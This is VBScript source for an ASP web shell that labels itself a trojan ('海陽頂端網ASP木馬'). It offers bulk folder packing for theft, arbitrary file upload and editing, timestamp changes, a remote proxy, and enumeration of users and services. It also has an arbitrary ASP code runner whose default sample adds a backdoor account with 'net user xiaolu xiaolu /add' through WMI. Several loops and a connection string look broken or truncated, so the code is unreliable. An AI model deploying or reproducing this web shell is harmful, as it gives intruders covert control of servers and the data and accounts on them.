Echo "<td> <input name=thePath value='" & HtmlEncode(rootPath) & "' style='width:467px;'> "
Echo "<input type=hidden value=PagePack name=PageName>"
Echo "<input type=hidden value=PackIt name=theAct>"
Echo "<input type=hidden value=APP name=Param>"
Echo "<input type=submit value='開始打包'>"
Echo "</td></tr>"
Echo "</form>"
Echo sFooter
Echo "<br />"
Echo Replace(sHeader, "{$s}", "文件夾打包器(需WScript.Shell支持)")
Echo "<form method=post action='" & url & "'>"
Echo "<tr>"
Echo "<td width='20%'> 打包</td>"
Echo "<td> <input name=cmdStr value='" & HtmlEncode(rootPath) & "' style='width:467px;'> "
Echo "<input type=hidden name=PageName value='PageWsCmdRun' />"
Echo "<input type=hidden value=PackIt name=theAct>"
Echo "<input type=submit value='開始打包'>"
Echo "</td></tr>"
Echo "</form>"
Echo sFooter
End Sub
Sub PackIt()
Dim rs, db, conn, stream, connStr, objX, sParam, strPath, strPathB, isFolder, adoCatalog
strPath = thePath
sParam = GetPost("Param")
db = strPath & "\" & sPacketName
If sParam = "" Then sParam = "FSO"
Set rs = Server.CreateObject("ADODB.RecordSet")
Set stream = Server.CreateObject("ADODB.Stream")
Set conn = Server.CreateObject("ADODB.Connection")
Set adoCatalog = Server.CreateObject("ADOX.Catalog")
connStr = "Provider=Microsoft.Jet.OLEDB.4.0; Data Source=" & db
If oFso.FolderExists(strPath) = False Then
ShowErr(thePath & " 目錄不存在或者不允許訪問!")
End If
If oFso.FileExists(db) = False Then
adoCatalog.Create connStr
conn.Open connStr
conn.Execute("Create Table FileData(Id int IDENTITY(0,1) PRIMARY KEY CLUSTERED, P Text, fileContent Image)")
conn.Open connStr
End If
stream.Type = 1
rs.Open "[FileData]", conn, 3, 3
If theAct = "PackIt" Then
If sParam = "FSO" Then Call FsoTreeForMdb(strPath, rs, stream)
If sParam = "APP" Then Call AppTreeForMdb(strPath, rs, stream)
strPath = GetPost("truePath") & "\"
For Each objX In Request.Form("checkBox")
strPathB = strPath & objX
isFolder = oFso.FolderExists(strPathB)
If isFolder = True Then
Execute("Call " & sParam & "TreeForMdb(strPathB, rs, stream)")
If isDebugMode = False Then On Error Resume Next
If InStr(sysFileList, "$" & objX & "$") <= 0 Then
rs("P") = Mid(strPathB, 4)
rs("fileContent") = stream.Read()
End If
End If
End If
Set rs = Nothing
Set conn = Nothing
Set stream = Nothing
Set adoCatalog = Nothing
End Sub
Sub UnPack()
Dim rs, ws, str, conn, stream, connStr, strPath, theFolder
If isDebugMode = False Then On Error Resume Next
strPath = thePath
str = oFso.GetParentFolderName(strPath) & "\"
Set rs = CreateObject("ADODB.RecordSet")
Set stream = CreateObject("ADODB.Stream")
Set conn = CreateObject("ADODB.Connection")
connStr = "Provider=Micro, soft.Jet.OLEDB.4.0;Data Source=" & strPath
conn.Open connStr
rs.Open "FileData", conn, 1, 1
stream.Type = 1
Do Until rs.Eof
theFolder = Left(rs("P"), InStrRev(rs("P"), "\"))
If oFso.FolderExists(str & theFolder) = False Then
CreateFolder(str & theFolder)
End If
If IsNull(rs("fileContent")) = False Then stream.Write rs("fileContent")
stream.SaveToFile str & rs("P"), 2
Set ws = Nothing
Set rs = Nothing
Set stream = Nothing
Set conn = Nothing
End Sub
Sub FsoTreeForMdb(strPath, rs, stream)
If isDebugMode = False Then On Error Resume Next
Dim item, theFolder, folders, files
Set theFolder = oFso.GetFolder(strPath)
Set files = theFolder.Files
Set folders = theFolder.SubFolders
For Each item In folders
Call FsoTreeForMdb(item.Path, rs, stream)
For Each item In files
If InStr(sysFileList, "$" & item.Name & "$") <= 0 Then
rs("P") = Mid(item.Path, 4)
rs("fileContent") = stream.Read()
End If
Set files = Nothing
Set folders = Nothing
Set theFolder = Nothing
End Sub
Sub AppTreeForMdb(sPath, rs, stream)
If isDebugMode = False Then On Error Resume Next
Dim oFolder, oMember, sFileName
If Len(sPath) > 3 And Right(sPath, 1) = "\" Then sPath = Left(sPath, Len(sPath) - 1)
Set oFolder = oShl.NameSpace(sPath)
For Each oMember In oFolder.Items
If oMember.IsFolder = True Then
Call AppTreeForMdb(oMember.Path, rs, stream)
sFileName = Mid(oMember.Path, InStrRev(oMember.Path, "\") + 1)
If InStr(sysFileList, "$" & sFileName & "$") <= 0 Then
rs("P") = Mid(oMember.Path, 4)
rs("fileContent") = stream.Read()
End If
End If
Set oFolder = Nothing
Set oMember = Nothing
End Sub
Sub PageUpload()
theAct = Request.QueryString("theAct")
If theAct = "upload" Then
Echo "<script>alert('上傳成功!');history.back();</script>"
End If
End Sub
Sub ShowUpload()
If thePath = "" Then thePath = rootPath
Echo "<form method=post onsubmit=this.Submit.disabled=true; enctype='multipart/form-data' action=?PageName=PageUpload&theAct=upload>"
Echo Replace(sHeader, "{$s}", "批量文件上傳")
Echo "<tr>"
Echo "<td width='20%'>"
Echo " 上傳到:"
Echo "</td>"
Echo "<td>"
Echo " <input name=thePath type=text id=thePath value=""" & HtmlEncode(thePath) & """ size=48><input type=checkbox name=overWrite>覆蓋模式"
Echo "</td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td valign=top>"
Echo " 文件選擇: "
Echo "</td>"
Echo "<td> <input id=fileCount size=6 value=1> <input type=button value=設(shè)定 onclick=makeFile(fileCount.value)>"
Echo "<div id=fileUpload>"
Echo " <input name=file1 type=file size=50>"
Echo "</div></td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td class=trHead colspan=2> </td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td align=center class=td colspan=2>"
Echo "<input type=submit name=Submit value=上傳 onclick=this.form.action+='&overWrite='+this.form.overWrite.checked;>"
Echo "<input type=reset value=重置><input type=button value=關(guān)閉 onclick=window.close();>"
Echo "</td>"
Echo "</tr>"
Echo "</table>"
Echo "</form>"
Echo "<script language=javascript>" & vbNewLine
Echo "function makeFile(n){" & vbNewLine
Echo " fileUpload.innerHTML = ' <input name=file1 type=file size=50>'" & vbNewLine
Echo " for(var i=2; i<=n; i++)" & vbNewLine
Echo " fileUpload.innerHTML += '<br/> <input name=file' + i + ' type=file size=50>';" & vbNewLine
Echo "}" & vbNewLine
Echo "</script>"
End Sub
Sub StreamUpload()
Dim sA, sB, aryForm, aryFile, theForm, newLine, overWrite
Dim strInfo, strName, strPath, strFileName, intFindStart, intFindEnd
Dim itemDiv, itemDivLen, intStart, intDataLen, intInfoEnd, totalLen, intUpLen, intEnd
If isDebugMode = False Then On Error Resume Next
Server.ScriptTimeOut = 99999
newLine = ChrB(13) & ChrB(10)
overWrite = Request.QueryString("overWrite")
overWrite = IIf(overWrite = "true", "2", "1")
Set sA = Server.CreateObject("Adodb.Stream")
Set sB = Server.CreateObject("Adodb.Stream")
sA.Type = 1
sA.Mode = 3
sA.Write Request.BinaryRead(Request.TotalBytes)
sA.Position = 0
theForm = sA.Read()
' sA.SaveToFile "c:\001.txt", 2 ''保存到臨時(shí)文件進(jìn)行查看
itemDiv = LeftB(theForm, InStrB(theForm, newLine) - 1)
totalLen = LenB(theForm)
itemDivLen = LenB(itemDiv)
intStart = itemDivLen + 2
intUpLen = 0 '上面數(shù)據(jù)的長度
intDataLen = InStrB(intStart, theForm, itemDiv) - itemDivLen - 5 ''equals - 2(回車) - 1(InStr) - 2(回車)
intDataLen = intDataLen - intUpLen
intEnd = intStart + intDataLen
intInfoEnd = InStrB(intStart, theForm, newLine & newLine) - 1
sB.Type = 1
sB.Mode = 3
sA.Position = intStart
sA.CopyTo sB, intInfoEnd - intStart ''保存元素信息部分
sB.Position = 0
sB.Type = 2
sB.CharSet = "GB2312"
strInfo = sB.ReadText()
strFileName = ""
intFindStart = InStr(strInfo, "name=""") + 6
intFindEnd = InStr(intFindStart, strInfo, """", 1)
strName = Mid(strInfo, intFindStart, intFindEnd - intFindStart)
If InStr(strInfo, "filename=""") > 0 Then ''>0則為文件,開始接收文件
intFindStart = InStr(strInfo, "filename=""") + 10
intFindEnd = InStr(intFindStart, strInfo, """", 1)
strFileName = Mid(strInfo, intFindStart, intFindEnd - intFindStart)
strFileName = Mid(strFileName, InStrRev(strFileName, "\") + 1)
End If
sB.Type = 1
sB.Mode = 3
sA.Position = intInfoEnd + 4
sA.CopyTo sB, intEnd - intInfoEnd - 4
If strFileName <> "" Then
sB.SaveToFile strPath & strFileName, overWrite
If strName = "thePath" Then
sB.Position = 0
sB.Type = 2
sB.CharSet = "GB2312"
strInfo = sB.ReadText()
thePath = strInfo
strPath = strInfo & "\"
End If
End If
intUpLen = intStart + intDataLen + 2
intStart = intUpLen + itemDivLen + 2
Loop Until (intStart + 2) = totalLen
Set sA = Nothing
Set sB = Nothing
End Sub
Sub PageLogin()
Dim passWord
passWord = Encode(GetPost("password"))
If theAct = "Login" Then
If userPassword = passWord Then
Session(m & "userPassword") = userPassword
Exit Sub
Echo userPassword & " = " & passWord
End If
End If
If PageName = "PageOut" Then
Session.Contents.Remove(m & "userPassword")
End If
If Session(m & "userPassword") = userPassword Then
Exit Sub
End If
Echo "<body onload=document.formx.password.focus();>"
Echo "<table width=416 align=center>"
Echo "<form method=post name=formx action=""" & url & """>"
Echo "<input type=hidden name=theAct value=Login>"
Echo "<input type=hidden name=PageName value='" & s & "'>"
Echo "<tr>"
Echo "<td align=center class=td>管 理 登 錄</td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td class=trHead> </td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td height=75 align=center>"
Echo "<input name=password type=password style='border:1px solid #d8d8f0;background-color:#ffffff;'> "
Echo "<input type=submit value=LOGIN style='border:1px solid #d8d8f0;background-color:#f9f9fd;'>"
Echo "</td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td align=center class=td>2006PLUS @ 海陽頂端網(wǎng)ASP木馬</td>"
Echo "</tr>"
Echo "</form>"
Echo sClientTracer
Echo "</table>"
Echo "</body>"
End Sub
Function Encode(sPass)
Dim i, sStr, sTmp
For i = 1 To Len(sPass)
sTmp = Asc(Mid(sPass, i, 1))
sStr = sStr & Abs(sTmp)
sPass = sStr
sStr = ""
Do While Len(sPass) > 16
sPass = JoinCutStr(sPass)
For i = 1 To Len(sPass)
sTmp = CInt(Mid(sPass, i, 1))
sTmp = IIf(sTmp > 6, Chr(sTmp + 60), sTmp)
sStr = sStr & sTmp
Encode = sStr
End Function
Function JoinCutStr(str)
Dim i, sStr
For i = 1 To Len(str)
If Len(str) - i = 0 Then Exit For
sStr = sStr & Chr(CInt((Asc(Mid(str, i, 1)) + Asc(Mid(str, i + 1, 1))) / 2))
i = i + 1
JoinCutStr = sStr
End Function
Sub PageExecute()
Dim strAspCode
strAspCode = GetPost("AspCode")
If strAspCode = "" Then
strAspCode = "REM 以下為ASP語句執(zhí)行示例, 其功能是在局域網(wǎng)中的其它有權(quán)限的機(jī)器上運(yùn)行相應(yīng)命令" & vbNewLine & vbNewLine & "set ww=server.createobject(""wbemscripting.swbemlocator"")" & vbNewLine & "set cc=ww.connectserver("""",""root/cimv2"",""administrator"",""xiaolu"")" & vbNewLine & "set ss=cc.get(""Win32_ProcessStartup"")" & vbNewLine & "Set pp=cc.get(""Win32_Process"")" & vbNewLine & "Response.Write pp.create(""net user xiaolu xiaolu /add"",null,oC,iProcessID)" & vbNewLine & "Echo ""<br>"" & iProcessID"
End If
If theAct = "Exe" Then
Echo "<table width=750 class=fixTable>"
Echo "<tr>"
Echo "<td class=trHead> </td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td class=td><font face=webdings>8</font> 執(zhí)行結(jié)果</td>"
Echo "</tr>"
Echo "<tr><td style='padding-left:6px;padding-right:5px;'>"
Echo "</td></tr></table>"
End If
End Sub
Sub ShowExeTable(strAspCode)
Echo "<form method=post onsubmit=this.Submit.disabled=true; action=""" & url & """>"
Echo Replace(sHeader, "{$s}", "自定義ASP語句執(zhí)行")
Echo "<tr>"
Echo "<td valign=top width='10%'>"
Echo " ASP語句: "
Echo "</td>"
Echo "<td> "
Echo "<textarea name=AspCode cols=91 rows=23 title='By Marcos 2006.02'>" & HtmlEncode(strAspCode) & "</textarea>"
Echo "</td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td class=trHead colspan=2> </td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td align=center class=td colspan=2>"
Echo "<input type=hidden name=PageName value=PageExecute>"
Echo "<input type=hidden name=theAct value=Exe>"
Echo "<input type=submit name=Submit value=提交>"
Echo "<input type=reset value=重置>"
Echo "</td>"
Echo "</tr>"
Echo "</table>"
Echo "</form>"
End Sub
Sub PageUserList()
Dim oUser, oGroup, oComputer
Set oComputer = GetObject("WinNT://.")
oComputer.Filter = Array("User")
Echo Replace(sHeader, "{$s}", "系統(tǒng)用戶信息查看")
For Each oUser in oComputer
Echo "<tr class=td><td> 用戶名:</td><td> " & oUser.Name & "</td></tr>"
Echo "<tr><td class=trHead colspan=2> </td></tr>"
Echo "<tr><td align=right class=td colspan=2>Powered By Marcos 2006.02 </td></tr></table>"
Echo "<br />"
Echo Replace(sHeader, "{$s}", "系統(tǒng)用戶組查看")
Echo "<tr><td class=td> 組名</td><td> 組描述</td></tr>"
oComputer.Filter = Array("Group")
For Each oGroup in oComputer
Echo "<tr><td style='padding-left:7px;'>" & oGroup.Name & "</td>"
Echo "<td style='padding-left:7px;'>" & oGroup.Description & "</td></tr>"
Echo sFooter
End Sub
Sub GetUserInfo(strUser)
Dim User, Flags
If isDebugMode = False Then
On Error Resume Next
End If
Set User = GetObject("WinNT://./" & strUser & ",user")
Echo "<tr><td> 描述:</td><td> " & User.Description & "</td></tr>"
Echo "<tr><td> 所屬用戶組:</td><td> " & GetItsGroup(strUser) & "</td></tr>"
Echo "<tr><td> 密碼已過期:</td><td> " & cbool(User.Get("PasswordExpired")) & "</td></tr>"
Flags = User.Get("UserFlags")
Echo "<tr><td> 密碼永不過期:</td><td> " & cbool(Flags And &H10000) & "</td></tr>"
Echo "<tr><td> 用戶不能更改密碼:</td><td> " & cbool(Flags And &H00040) & "</td></tr>"
Echo "<tr><td> 非全局帳號(hào):</td><td> " & cbool(Flags And &H100) & "</td></tr>"
Echo "<tr><td> 密碼的最小長度:</td><td> " & User.PasswordMinimumLength & "</td></tr>"
Echo "<tr><td> 是否要求有密碼:</td><td> " & User.PasswordRequired & "</td></tr>"
Echo "<tr><td> 帳號(hào)停用中:</td><td> " & User.AccountDisabled & "</td></tr>"
Echo "<tr><td> 帳號(hào)鎖定中:</td><td> " & User.IsAccountLocked & "</td></tr>"
Echo "<tr><td> 用戶信息文件:</td><td> " & User.Profile & "</td></tr>"
Echo "<tr><td> 用戶登錄腳本:</td><td> " & User.LoginScript & "</td></tr>"
Echo "<tr><td> 用戶Home目錄:</td><td> " & User.HomeDirectory & "</td></tr>"
Echo "<tr><td> 用戶Home目錄根:</td><td> " & User.Get("HomeDirDrive") & "</td></tr>"
Echo "<tr><td> 帳號(hào)過期時(shí)間:</td><td> " & User.AccountExpirationDate & "</td></tr>"
Echo "<tr><td> 帳號(hào)失敗登錄次數(shù):</td><td> " & User.BadLoginCount & "</td></tr>"
Echo "<tr><td> 帳號(hào)最后登錄時(shí)間:</td><td> " & User.LastLogin & "</td></tr>"
Echo "<tr><td> 帳號(hào)最后注銷時(shí)間:</td><td> " & User.LastLogoff & "</td></tr>"
For Each RegTime In User.LoginHours
If RegTime < 255 Then Restrict = True
Echo "<tr><td> 帳號(hào)已用時(shí)間:</td><td> " & Restrict & "</td></tr>"
End Sub
Function GetItsGroup(sUser)
Dim oUser, oGroup
Set oUser = GetObject("WinNT://./" & sUser & ",user")
For Each oGroup In oUser.Groups
GetItsGroup = GetItsGroup & oGroup.Name & " "
End Function
Sub PageServiceList()
Dim oService, oComputer
If isDebugMode = False Then On Error Resume Next
Set oComputer = GetObject("WinNT://.")
oComputer.Filter = Array("Service")
Echo Replace(sHeader, "{$s}", "系統(tǒng)服務(wù)信息查看")
For Each oService In oComputer
Echo "<tr class=td><td width=105> 服務(wù)名稱: </td><td style='padding-left:7px;'>" & oService.Name & "</td></tr>"
Echo "<tr><td> 顯示名稱: </td><td style='padding-left:7px;'>" & oService.DisplayName & "</td></tr>"
Echo "<tr><td> 啟動(dòng)類型: </td><td style='padding-left:7px;'>" & oGetStartType(oService.StartType) & "</td></tr>"
Echo "<tr><td> 運(yùn)行狀態(tài): </td><td style='padding-left:7px;'>" & oShl.IsServiceRunning(oService.Name) & "</td></tr>"
Echo "<tr><td> 登錄身份: </td><td style='padding-left:7px;'>" & oService.ServiceAccountName & "</td></tr>"
' Echo "當(dāng)前狀態(tài): " & oService.Status & "<br/>"
' Echo "服務(wù)類型: " & oService.ServiceType & "<br/>"
Echo "<tr><td> 服務(wù)描述: </td><td class=fixTable style='padding-left:7px;'>" & GetServiceDsc(oService.Name) & "</td></tr>"
Echo "<tr><td> 文件路徑及參數(shù): </td><td style='padding-left:7px;'>" & oService.Path & "</td></tr>"
Echo "<tr><td class=trHead colspan=2> </td></tr>"
Echo "<tr><td align=right class=td colspan=2>Powered By Marcos 2006.02 </td></tr></table>"
End Sub
Function GetServiceDsc(sService)
GetServiceDsc = oWshl.RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\" & sService & "\Description")
End Function
Function GetStartType(n)
Select Case n
Case 2
GetStartType = "自動(dòng)"
Case 3
GetStartType = "手動(dòng)"
Case 4
GetStartType = "已禁用"
End Select
End Function
Sub PageWebProxy()
Dim i, re, Html
If sUrl <> "" Then Url = sUrl Else Url = Request.QueryString("url")
If Url = "" Then Response.Redirect("?PageName=PageWebProxy&url=http://hididi.net/")
Set re = New RegExp
re.IgnoreCase = True
re.Global = True
sUrlB = Url
Html = getHTTPPage(Url)
If sUrl <> "" Then Echo Html:Response.End()
Url = Left(Url, InStrRev(Url, "/"))
i = InStr(sUrlB, "?")
If i > 0 Then
sUrlB = Left(sUrlB, i - 1)
End If
re.Pattern = "(href|action)=(\'|"")?(\?)"
Html = re.Replace(Html,"$1=$2" & sUrlB & "?")
re.Pattern = "(src|action|href)=(\'|"")?((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)(\'|"")?"
Html = re.Replace(Html,"$1x=$2$3$2")
re.Pattern = "(window\.open|url)\((\'|"")?((http|https):(\/\/|\\\\)[A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?\)"
Html = re.Replace(Html,"$1x($2$3$2)")
re.Pattern = "(src|action|href|background)=(\'|"")?([^\/""\'][A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?"
Html = re.Replace(Html,"$1=$2" & Url & "$3$2")
re.Pattern = "(src|action|href|background)=(\'|"")?\/([^""\'][A-Za-z0-9\./=\?%\-&_~`@[\]:+!]+([^\'<>""])+)(\'|"")?"
Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$3$2")
re.Pattern = "(src|action|href)=(\'|"")?\/(\'|"")?"
Html = re.Replace(Html,"$1=$2http://" & Split(Url, "/")(2) & "/$2")
re.Pattern = "(window\.open|url)\((\'|"")?([^\/""\'http:][A-Za-z0-9\./=\?%\-&_~`@[\]+!]+([^\'<>""])+)(\'|"")?\)"
Html = re.Replace(Html,"$1($2" & Url & "$3$2)")
re.Pattern = "(window\.open|url)\((\'|"")?\/([^""\'http:][A-Za-z0-9\./=\?%\-&_~`@[\]+!]+([^\'<>""])+)(\'|"")?\)"
Html = re.Replace(Html,"$1($2http://" & Split(Url, "/")(2) & "/$3$2)")
Html = Replace(Html, "&", "%26")
Html = Replace(Html, "%26nbsp;", " ")
Html = Replace(Html, "%26lt;", "<")
Html = Replace(Html, "%26gt;", ">")
Html = Replace(Html, "%26quot;", """)
Html = Replace(Html, "%26copy;", "©")
Html = Replace(Html, "%26reg;", "®")
Html = Replace(Html, "%26raquo;", "»")
Html = Replace(Html, "%26%26", "&&")
Html = Replace(Html, "%26#", "&#")
re.Pattern = "(src|action|href)x=(\'|"")?((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)(\'|"")?"
Html = re.Replace(Html, "$1=$2$3$2")
re.Pattern = "((http|https):(\/\/|\\\\)[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)"
Html = re.Replace(Html, "?PageName=PageWebProxy&url=$1")
re.Pattern = "\?PageName=PageWebProxy&url=" & Url & "(#|javascript:)"
Html = re.Replace(Html, "$1")
re.Pattern = "multipart\/form-data"
Html = re.Replace(Html, "")
re.Pattern = ">\?PageName=PageWebProxy&url=((http|https|javascript):[A-Za-z0-9\./=\?%\-&_~`@[\]\':+!]+([^<>""])+)<"
Html = re.Replace(Html, ">$1<")
Echo Html
End Sub
Function GetHTTPPage(url)
Dim Http, x, theStr, fileExt
Set Http = Server.CreateObject("MSXML2.XMLHTTP")
If Request.Form.Count > 0 Then
For Each x In Request.Form
theStr = theStr & UrlEncode(x) & "=" & UrlEncode(Request.Form(x)) & "&"
Http.Open "POST", url, False
Http.SetRequestHeader "CONTENT-TYPE", "application/x-www-form-urlencoded"
On Error Resume Next
Http.Open "GET", url, False
End If
If Http.ReadyState <> 4 Then Exit Function
fileExt = LCase(Mid(url, InStrRev(url, ".") + 1))
If InStr("$jpg$gif$bmp$png$js$", "$" & fileExt & "$") > 0 Then
Response.BinaryWrite Http.ResponseBody
If InStr("$rar$mdb$zip$exe$com$ico$", "$" & fileExt & "$") > 0 Then
Response.AddHeader "Content-Disposition", "Attachment; Filename=" & Mid(sUrlB, InStrRev(sUrlB, "/") + 1)
Response.BinaryWrite Http.ResponseBody
getHTTPPage = bytesToBSTR(Http.ResponseBody, "GB2312")
End If
End If
Set Http = Nothing
End Function
Function bytesToBSTR(body,Cset)
Dim objstream
Set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
bytesToBSTR = objstream.ReadText
Set objstream = nothing
End Function
Sub PageApp()
Server.ScriptTimeout = 600
Select Case theAct
Case "newone"
sUrlB = GetPost("truePath") & GetPost("Param")
sUrlB = Left(sUrlB, Len(sUrlB) - 1)
Case "rename"
Case "download"
Case "showimage"
Case "showedit"
Case "save"
Case "saveas"
Case "move"
Case "lastmodify"
End Select
End Sub
Sub AppFileExplorer()
Dim sPath, oFolder, sFather, sFolderId, oMember, sFolderList, sFileList, sFileName, sFilePath, sExtName
If thePath = "" Then thePath = rootPath
Set oFolder = oShl.NameSpace(thePath)
sFather = GetParentPath(thePath)
Echo "<form method=post action='" & url & "'>"
Echo "<input type=hidden name=theAct>"
Echo "<input type=hidden name=param>"
Echo "<input type=hidden value=PageApp name=PageName id=PageName />"
Echo Replace(sHeader, "{$s}", "APP文件瀏覽操作器")
Echo "<td colspan=2> "
Echo "路徑: <input style='width:500px;' name=thePath value=""" & HtmlEncode(thePath) & """>"
Echo "<input type=hidden name=truePath value=""" & HtmlEncode(thePath) & "\"">"
Echo " <input type=button value='提交' onclick=Command('submit');>"
Echo " <input type=button value=上傳 onclick=Command('upload')>"
Echo " <input type=button value=新文件 onclick=Command('newone','')>"
Echo " <a href=""javascript:changeThePath("" & Replace(rootPath, "\", "\\") & "");"">站點(diǎn)根</a>"
Echo "</td>"
Echo "</tr>"
Echo "<tr><td colspan=2 class=trHead> </td></tr>"
Echo "<tr><td valign=top colspan=2>"
Echo "<table width='99%' align=center>"
Echo "<tr><td colspan=4 class=trHead> </td></tr><tr class=td><td>"
If sFather <> "" Then
If Left(sFather, 2) = "::" Then sFather = Left(sFather, Len(sFather) - 1)
sFolderId = Replace(sFather, "\", "\\")
Echo " <a href=""javascript:changeThePath("" & sFolderId & "");"">↑回上級(jí)目錄</a>"
End If
Echo "</td><td align=center width=80>大小</td>"
Echo "<td align=center width=140>最后修改</td><td align=center>操作</td></tr>"
For Each oMember In oFolder.Items
If oMember.IsFolder = True Then
If Left(oMember.Path, 2) = "::" Then sPath = oMember.Path Else sPath = oMember.Path & "\"
sFolderId = Replace(sPath, "\", "\\")
sFolderList = sFolderList & "<tr title=""" & oMember.Name & """><td> <font color=CCCCFF>■</font>"
sFolderList = sFolderList & "<span class=fixSpan style='width:180;'><a href=""javascript:changeThePath("" & sFolderId & "");"">" & oMember.Name & "</a></td>"
sFolderList = sFolderList & "<td align=center>-</td><td align=center>" & oFolder.GetDetailsOf(oMember, 3) & "</td><td>"
sFolderList = sFolderList & "<input type=button onclick=""Command('rename',"" & oMember.Name & "");"" value='Ren' title=重命名>"
' sFolderList = sFolderList & "<input type=button value='Move' title=移動(dòng) onclick=""Command('move',"" & Replace(oMember.Path, "\", "\\") & "")"">"
' sFolderList = sFolderList & "<input type=button value='SaveAs' title=另存為 onclick=""Command('saveas',"" & Replace(oMember.Path, "\", "\\") & "")"">"
sFolderList = sFolderList & "<input type=button value='LM' title=最后修改時(shí)間 onclick=""Command('lastmodify',"" & oMember.Name & "*" & oFolder.GetDetailsOf(oMember, 3) & "")"">"
sFolderList = sFolderList & "</td></tr>"
sFilePath = oMember.Path
sFileName = Mid(sFilePath, InStrRev(sFilePath, "\") + 1)
sExtName = LCase(Mid(sFileName, InStrRev(sFileName, ".") + 1))
If InStr(sFilePath, rootPath) > 0 Then
sFolderId = Replace(Replace(Replace(UrlEncode(Mid(sFilePath, Len(rootPath) + 1)), "%2E", "."), "%5C", "/"), "+", "%20")
sFolderId = "javascript:;"
End If
sFileList = sFileList & "<tr title=""" & sFileName & """><td> <font color=CCCCFF>□</font>"
sFileList = sFileList & "<span class=fixSpan style='width:180;'><a href=""" & sFolderId & """" & IIf(sFolderId = "javascript:;", "", "target='_blank'") & ">" & sFileName & "</a></td>"
sFileList = sFileList & "<td align=center>" & oFolder.GetDetailsOf(oMember, 1) & "</td><td align=center>" & oFolder.GetDetailsOf(oMember, 3) & "</td><td>"
If InStr(editableFileExt, "$" & sExtName & "$") > 0 Then
sFileList = sFileList & "<input type=button value='Edit' title=編輯 onclick=""Command('showedit',"" & sFileName & "");"">"
End If
If InStr(imageFileExt, "$" & sExtName & "$") > 0 Then
sFileList = sFileList & "<input type=button value='View' title=查看圖片 onclick=""Command('showimage',"" & sFileName & "");"">"
End If
If sExtName = "mdb" Then
sFileList = sFileList & "<input type=button value='Access' title=數(shù)據(jù)庫操作 onclick=Command('access',""" & sFileName & """)>"
End If
sFileList = sFileList & "<input type=button value='D' title=下載 onclick=""Command('download',"" & sFileName & "")"">"
sFileList = sFileList & "<input type=button value='Ren' title=重命名 onclick=""Command('rename',"" & sFileName & "*" & oMember.Name & "")"">"
' sFileList = sFileList & "<input type=button value='S' title=另存為 onclick=""Command('saveas',"" & Replace(oMember.Path, "\", "\\") & "")"">"
sFileList = sFileList & "<input type=button value='LM' title=最后修改時(shí)間 onclick=""Command('lastmodify',"" & sFileName & "*" & oFolder.GetDetailsOf(oMember, 3) & "")"">"
' sFileList = sFileList & "<input type=button value='M' title=移動(dòng) onclick=""Command('move',"" & Replace(oMember.Path, "\", "\\") & "")"">"
sFileList = sFileList & "</td></tr>"
End If
Echo sFolderList & sFileList
Echo Replace(sFooter, "=2", "=4")
Echo "</form>"
Set oFolder = Nothing
End Sub
Function GetParentPath(sPath)
Dim sFather
If Right(sPath, 1) = "\" Then sFather = Left(sPath, Len(sPath) - 1) Else sFather = sPath
If Len(sFather) = 2 Then
GetParentPath = " "
GetParentPath = Left(sFather, InStrRev(sFather, "\"))
End If
End Function
Function StreamSaveToFile(sPath)
Dim oStream, sFileContent
If isDebugMode = False Then On Error Resume Next
If sPath = "" Then sPath = GetPost("truePath")
sFileContent = GetPost("fileContent")
Set oStream = Server.CreateObject("adodb.stream")
With oStream
.WriteText sFileContent
.saveToFile sPath, 2
End With
Set oStream = Nothing
End Function
Sub StreamShowEdit()
Dim sPath, sFileContent
If isDebugMode = False Then On Error Resume Next
sPath = GetPost("truePath") & GetPost("param")
sFileContent = StreamLoadFromFile(sPath)
Echo "<form method=post action='" & url & "'>"
Echo Replace(Replace(sHeader, "{$s}", "Stream文本編輯器"), "=2", "=1")
Echo "<input type=hidden name=theAct>"
Echo "<input type=hidden value=PageApp name=PageName>"
Echo "<tr>"
Echo "<td height=22> <input name=truePath value=""" & sPath & """ style=width:500px;>"
Echo "<input type=submit value=查看 onClick=this.form.theAct.value='showedit';></td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td> <textarea name=fileContent style='width:735px;height:500px;'>"
Echo HtmlEncode(sFileContent)
Echo "</textarea></td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td class=trHead> </td>"
Echo "</tr>"
Echo "<tr>"
Echo "<td class=td align=center><input type=button name=Submit value=保存 onClick=""if(confirm('確認(rèn)保存修改?')){this.form.theAct.value='save';this.form.submit();}"">"
Echo "<input type=reset value=重置><input type=button onclick='window.close();' value=關(guān)閉>"
Echo "<input type=button value=預(yù)覽 onclick=preView('1'); title='以HTML方式在新窗口中預(yù)覽當(dāng)前代碼'></td>"
Echo "</tr>"
Echo "</form>"
Echo "</table>"
End Sub
Sub AppSaveAs(sFlag)
Dim aParam, oTarFolder, sFileName, sFather
If isDebugMode = False Then On Error Resume Next
aParam = Split(GetPost("param"), ",")
sFather = aParam(1)
If Right(sFather, 1) = "\" And Len(sFather) > 3 Then
sFather = Left(sFather, Len(sFather) - 1)
sFather = GetParentPath(sFather)
If Len(sFather) > 3 Then sFather = Left(sFather, Len(sFather) - 1)
End If
If Right(aParam(0), 1) = "\" And Len(aParam(0)) > 3 Then aParam(0) = Left(aParam(0), Len(aParam(0)) - 1)
Set oTarFolder = oShl.NameSpace(sFather)
If sFlag = "Copy" Then oTarFolder.CopyHere(aParam(0))
If sFlag = "Move" Then oTarFolder.MoveHere(aParam(0))
End Sub
Sub AppSetProperties(sFlag)
